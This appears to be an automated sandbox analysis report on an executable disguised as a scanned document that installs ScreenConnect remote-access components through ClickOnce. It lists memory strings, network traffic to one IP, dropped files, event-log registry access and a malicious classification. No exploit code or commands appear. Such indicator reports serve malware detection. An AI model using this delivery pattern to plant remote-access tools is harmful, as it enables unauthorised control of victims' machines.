                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056592993.0000022265357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056383195.000002226535A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000007.00000002.3273016707.0000022265ABF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                  Source: svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfet
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfo
                  Source: svchost.exe, 00000007.00000002.3272976064.0000022265AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comanc
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Scan_doc_09_16_24_1120.exe
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_0083A4950_2_0083A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F1AF4F1_2_00007FF848F1AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3B1ED1_2_00007FF848F3B1ED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F233A11_2_00007FF848F233A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2D5991_2_00007FF848F2D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F227481_2_00007FF848F22748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F1FA111_2_00007FF848F1FA11
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F112111_2_00007FF848F11211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F161381_2_00007FF848F16138
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F328601_2_00007FF848F32860
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848F470BA13_2_00007FF848F470BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848F410CF13_2_00007FF848F410CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848F410D713_2_00007FF848F410D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849255BB113_2_00007FF849255BB1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849255DC413_2_00007FF849255DC4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF8492567F913_2_00007FF8492567F9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF848F310CF15_2_00007FF848F310CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF848F310D715_2_00007FF848F310D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF84924713815_2_00007FF849247138
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF84924F4A215_2_00007FF84924F4A2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF84924E6F615_2_00007FF84924E6F6
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF8492528D915_2_00007FF8492528D9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF849245F6115_2_00007FF849245F61
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal66.evad.winEXE@21/78@2/2
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCommand line argument: dfshim0_2_00831000
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Scan_doc_09_16_24_1120.exeVirustotal: Detection: 13%
